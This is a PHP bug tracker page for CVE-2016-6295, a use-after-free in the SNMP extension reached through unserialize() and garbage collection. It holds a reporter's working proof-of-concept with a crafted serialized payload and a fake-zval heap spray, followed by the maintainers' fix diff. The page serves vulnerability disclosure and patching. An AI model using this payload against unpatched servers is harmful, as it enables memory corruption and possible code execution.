PHP :: Sec Bug #72479 :: Use After Free Vulnerability in SNMP with GC and unserialize()

Sec Bug #72479	Use After Free Vulnerability in SNMP with GC and unserialize()
Submitted:	2016-06-23 14:39 UTC	Modified:	2016-07-25 15:20 UTC
From:	taoguangchen at icloud dot com	Assigned:	stas (profile)
Status:	Closed	Package:	SNMP related
PHP Version:	5.5.37	OS:	*
Private report:	No	CVE-ID:	2016-6295

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	taoguangchen at icloud dot com
New email:
PHP Version:		OS:

New Comment:

[2016-06-23 14:39 UTC] taoguangchen at icloud dot com

Description:
------------
Use After Free Vulnerability in SNMP with GC and unserialize()

This bug is similar to bug#72434:

PoC:
```
<?php

$arr = [1, [1, 2, 3, 4, 5], 3, 4, 5];
$poc = 'a:3:{i:1;N;i:2;O:4:"snmp":1:{s:11:"quick_print";'.serialize($arr).'}i:1;R:7;}';
$out = unserialize($poc);
gc_collect_cycles();
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
for ($i = 0; $i < 5; $i++) {
    $v[$i] = $fakezval.$i;
}
var_dump($out[1]);

function ptr2str($ptr)
{
    $out = '';
    for ($i = 0; $i < 8; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

?>
```

Expected result:
```
int(1)
```

Actual result:
```
int(1122334455)
```

Fix:
```
}
/* }}} */

+static HashTable *php_snmp_get_gc(zval *object, zval ***gc_data, int *gc_data_count TSRMLS_DC) /* {{{ */
+{
+	*gc_data = NULL;
+	*gc_data_count = 0;
+	return zend_std_get_properties(object TSRMLS_CC);
+}
+/* }}} */

/* {{{ php_snmp_get_properties(zval *object)
   Returns all object properties. Injects SNMP properties into object on first call */
static HashTable *php_snmp_get_properties(zval *object TSRMLS_DC)
{
...
	php_snmp_object_handlers.has_property = php_snmp_has_property;
+	php_snmp_object_handlers.get_gc = php_snmp_get_gc;
	php_snmp_object_handlers.get_properties = php_snmp_get_properties;
```

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-06-27 01:08 UTC] stas@php.net

-PHP Version: Irrelevant +PHP Version: 5.5.37 -Assigned To: +Assigned To: stas

[2016-06-27 01:08 UTC] stas@php.net

Added fix as cab1c3b3708eead315e033359d07049b23b147a3 and https://gist.github.com/035a95208257aed53e7221275d57a231

[2016-07-19 07:47 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

[2016-07-19 07:47 UTC] stas@php.net

-Status: Assigned +Status: Closed

[2016-07-19 07:53 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

[2016-07-19 08:39 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

[2016-07-19 08:55 UTC] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

[2016-07-25 15:20 UTC] remi@php.net

-CVE-ID: +CVE-ID: 2016-6295

[2016-10-17 10:11 UTC] bwoebi@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=cab1c3b3708eead315e033359d07049b23b147a3
Log: Fixed bug #72479 - same as #72434

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Nov 21 12:01:29 2024 UTC